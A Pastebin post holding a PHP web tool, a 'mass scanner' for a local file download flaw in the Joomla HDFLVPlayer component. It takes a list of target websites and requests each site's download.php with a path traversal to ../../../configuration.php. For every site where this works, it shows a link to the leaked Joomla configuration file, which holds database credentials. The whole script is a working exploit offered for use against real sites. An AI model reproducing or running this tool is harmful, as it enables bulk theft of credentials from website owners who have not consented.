KeyDown

Joomla HDFLVPlayer LFD Mass Scanner

Dec 27th, 2015
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.33 KB | None | 0 0
  1. <!--
  2. Coded By Synchronizer
  3. Facebook : http://facebook.com/annam.go.id
  4.  
  5. i'm not hacker :)
  6. i just muslim people , yang kadang kadang coli sambil salto :)
  7. -->
  8.  
  9. <html>
  10. <title>Joomla HDFLVPlayer LFD Mass Scanner</title>
  11. <style>
  12. body {
  13.     background:#3E3939;
  14.     color:lime;
  15. }
  16. a {
  17.     text-decoration:none;
  18. }
  19. .keydown {
  20.     background:black;
  21.     color:lime;
  22.     width:300px;
  23.     height:30px;
  24.     border:1px solid lime;
  25. }
  26. .syn { background:#CEC018;border: 1px solid green;color: black;width:500px;}
  27. td {
  28.     text-align:center;
  29.     padding:1px;
  30.     background:whitesmoke;
  31.     color: black;
  32. }
  33. </style>
  34. <center><h1>Joomla HDFLVPlayer LFD  Mass Scanner</h1>
  35. <h4>coded by <a href="http://fb.com/annam.go.id"><font color=white>synchronizer</font></a></h4>
  36. <form method="post" action="" enctype="multipart/form-data">
  37. <textarea placeholder="your target without http:// => www.target.com" style="padding: 5px; resize: none; width: 500px; height: 200px; border: solid 2px #006400;" name="sites"></textarea><br>
  38. <br><input type="submit" class="keydown" name="scan" value="START CHECKING !" style="margin: 5px auto;">
  39. </form>
  40. <?php
  41. if(isset($_POST['sites'])) {
  42. $databro = $_POST['sites'];
  43. if(empty($databro)) {
  44. echo 'WEBSITE LIST NOT FOUND, TEXT AREA CAN`T EMPTY<br><br><font color=yellow size=4>SCAN CANCELED !</font>';
  45. }else {
  46. echo'<hr color=silver width=500px><br><table class="syn">
  47.   <tr>
  48.    <th>NO</th>
  49.    <th>WEBSITE</th>
  50.    <th>VULN</th>
  51.    <th>LINK</th>
  52.   </tr>
  53. ';
  54. $no=1;
  55. $site = explode("\r\n", $_POST['sites']);
  56. $dana = str_replace('http://','',$site);
  57. $wkwkwk = str_replace('https://','',$dana);
  58. $totalsite = count($site);
  59. foreach($wkwkwk as $sites) {
  60. $path = "http://$sites/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php";
  61. $gett=@file_get_contents($path);
  62. if(preg_match('/class JConfig {/',$gett)==1) {
  63. $status = "<font color=green>YES</font>";
  64. $link = "<a href='http://$sites/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php' target='_blank'>CLICK HERE</a>";}
  65. else{
  66. $status = "<font color=red>NO</font>";
  67. $link = "NOT AVAILABLE";
  68. }
  69. echo'
  70. <center><tr>
  71. <td>'.$no.'</td>
  72.    <td>'.$sites.'</td>
  73.    <td>'.$status.'</td>
  74.    <td>'.$link.'</td>  
  75.   </tr></center>
  76.   ';
  77. $no++;
  78. }
  79. echo'</table><br><Br>';
  80. echo 'TOTAL WEBSITE CHECKED : '.$totalsite;
  81. echo '</center>';
  82. }
  83. }
  84. ?>
Add Comment
Please, Sign In to add comment